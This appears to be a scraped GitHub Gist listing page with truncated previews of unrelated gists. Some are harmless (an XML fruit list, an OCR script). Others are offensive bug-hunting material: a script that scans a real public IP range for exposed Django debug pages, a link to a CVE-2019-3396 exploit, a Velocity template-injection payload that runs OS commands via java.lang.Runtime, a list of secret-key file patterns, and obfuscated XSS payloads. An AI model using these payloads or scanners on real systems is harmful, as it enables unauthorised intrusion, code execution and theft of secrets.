View c.xml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" ?> | |
<fruits> | |
<fruit> | |
<name>Lemon</name> | |
<description>Yellow and sour</description> | |
</fruit> | |
<fruit> | |
<name>Watermelon</name> | |
<description>Round, green outside, red inside</description> | |
</fruit> |
View ocr.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### | |
# Usage : python ocr.py --image image_name.png --preprocess blur | |
### | |
from PIL import Image | |
import pytesseract | |
import argparse | |
import cv2 | |
import os | |
ap = argparse.ArgumentParser() |
View soultionForGitAndGithub
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Just checkout all the commits one by one. | |
Simple ! but only if you know the fundamentals of Git commits ;). |
View django_debug_true.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
base = "http://104.254.204." | |
path = "/reporting/" | |
print "Django DEBUG=true Checker\n\n" | |
for i in range(255) : | |
print "Testing : "+base+str(1)+"/" | |
r = requests.get(base+str(1)+path) | |
if "ImportError" in r.text : | |
print ": Vulnerable" | |
else : |
View as.vm
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://raw.githubusercontent.com/CaptainFreak/CVE-2019-3396/master/os.vm |
View as.vm
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#set($engine="string")#set($run=$engine.getClass().forName("java.lang.Runtime"))#set($runtime=$run.getRuntime())#set($proc=$runtime.exec("ls"))#set($null=$proc.waitFor())#set($istr=$proc.getInputStream())#set($chr=$engine.getClass().forName("java.lang.Character"))#set($output="")#set($string=$engine.getClass().forName("java.lang.String"))#foreach($i in [1..$istr.available()])#set($output=$output.concat($string.valueOf($chr.toChars($istr.read()))))#end$output |
View secret key regexes by ayoubfathi
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Files: | |
====== | |
"otr.private_key" | |
".agilekeychain" | |
".asc" | |
".bek" | |
".cscfg" | |
".dayone" | |
".exports" | |
".extra" |
View XSs payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
XSS PAYLOADS - @OFJAAAH | |
: \');confirm(1);// | |
<x/onmouSeenter=window[`\x61\x6c\x65\x72\x74`]`1337` | |
<script>prompt(1)</script> | |
<script>confirm(1)</script> | |
<script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script> | |
<script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script> | |
<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script> |